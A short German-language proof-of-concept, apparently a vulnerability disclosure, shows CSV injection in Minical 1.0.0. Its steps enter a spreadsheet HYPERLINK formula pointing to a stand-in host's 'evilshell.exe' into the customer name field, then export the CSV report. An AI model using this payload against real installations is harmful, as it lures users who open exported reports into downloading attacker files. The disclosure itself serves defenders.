
Proof-of-Concept, der eine CSV-Injection-Schwachstelle in Minical 1.0.0 über einen bösartigen HYPERLINK-Payload im Feld für den Kundennamen demonstriert, was beim Herunterladen des Berichts zu einer Remote-Code-Ausführung führt.
Minical 1.0.0 ist anfällig für CSV-Injection.
Anbieter: https://github.com/minical/minical
Demo-Anwendung: https://demo.minical.io/
Schritt 1: Navigieren Sie zum Modul "Buchhaltung" und klicken Sie auf "Neuen Kunden anlegen".

Schritt 2: Geben Sie die Payload in das Feld "Name" ein und klicken Sie auf "Erstellen".
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Schritt 3: Klicken Sie auf "CSV-Bericht herunterladen" und beobachten Sie, wie die Payload gerendert wird.
